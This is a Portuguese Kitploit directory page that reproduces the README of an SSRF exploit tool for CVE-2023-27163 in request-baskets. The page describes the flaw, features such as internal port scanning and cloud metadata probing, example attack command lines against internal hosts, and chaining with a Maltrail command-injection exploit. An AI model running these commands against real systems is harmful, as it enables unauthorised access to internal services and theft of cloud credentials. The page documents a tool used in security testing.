Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-27163-exploit — Exploit de SSRF para CVE-2023-27163 em request-baskets, permitindo varredura de portas internas, sondagem de metadados da nuvem e descoberta de serviços através de encaminhamento malicioso de baskets. | Kitploit
Ferramentas/GitHubGitHub/jeanback1/cve-2023-27163-exploit
ReconhecimentoEscaneamento de PortasAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança na Nuvem
GitHubjeanback1/cve-2023-27163-exploit

CVE-2023-27163-exploit

Exploit de SSRF para CVE-2023-27163 em request-baskets, permitindo varredura de portas internas, sondagem de metadados da nuvem e descoberta de serviços através de encaminhamento malicioso de baskets.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 3 mesesAinda não revisado

CVE-2023-27163 — Exploração SSRF no request-baskets

Eu escrevi este exploit para atingir a CVE-2023-27163, uma vulnerabilidade de Server-Side Request Forgery (SSRF) encontrada no request-baskets versões ≤ 1.2.1. A falha reside no endpoint /api/baskets/{name}, onde o parâmetro forward_url permite que um atacante faça o servidor emitir requisições HTTP arbitrárias em seu nome.

Como funciona

O exploit cria um "basket" malicioso configurado com um forward_url apontando para um alvo interno. Qualquer requisição feita ao endpoint desse basket é encaminhada pelo servidor para a URL especificada, efetivamente transformando o servidor em um proxy SSRF.

Características

  • Encaminhamento de requisição SSRF para qualquer URL interna ou externa
  • Varredura de portas em hosts internos via probe HTTP
  • Sondagem de endpoints de metadados em nuvem (AWS, GCP, Azure, DigitalOcean, Alibaba)
  • Descoberta de serviços internos comuns
  • Perfis de basket configuráveis (proxy, TLS inseguro, expansão de caminho)

Requisitos

  • Python 3.6+
  • Biblioteca requests (pip install requests)

Uso

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-f FORWARD_URL] [--proxy-response]
                  [--insecure-tls] [--no-expand-path] [--capacity CAPACITY]
                  [--scan-host SCAN_HOST] [--ports PORTS] [--scan]
                  [--discover] [--cloud-metadata] [--timeout TIMEOUT]
                  [--delay DELAY]

Exemplos

root@kitploit:~
# Encaminhamento SSRF básico para um serviço interno
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80/admin

# Varredura de portas em um host interno
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 127.0.0.1 --scan

# Sondagem de endpoints de metadados em nuvem
python3 exploit.py -t http://192.168.1.100:55555 --cloud-metadata

# Modo proxy (retorna o corpo da resposta encaminhada)
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80 --proxy-response

# Varredura com faixa de portas personalizada
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 10.0.0.2 \
         --ports 80,443,3000,5000,8000,8080,9000

Aviso

Construí esta ferramenta apenas para fins educacionais e testes de segurança autorizados. Não a utilize contra sistemas sem permissão explícita.


Encadeie com

Este exploit SSRF pode ser usado como um ponto de entrada inicial para alcançar serviços internos que não estão diretamente expostos. Eu o projetei para funcionar junto com o Maltrail-v0.53-Exploit — o túnel SSRF permite que você atinja uma instância do Maltrail rodando em localhost e acione a injeção de comandos através dele.

Baixar ferramenta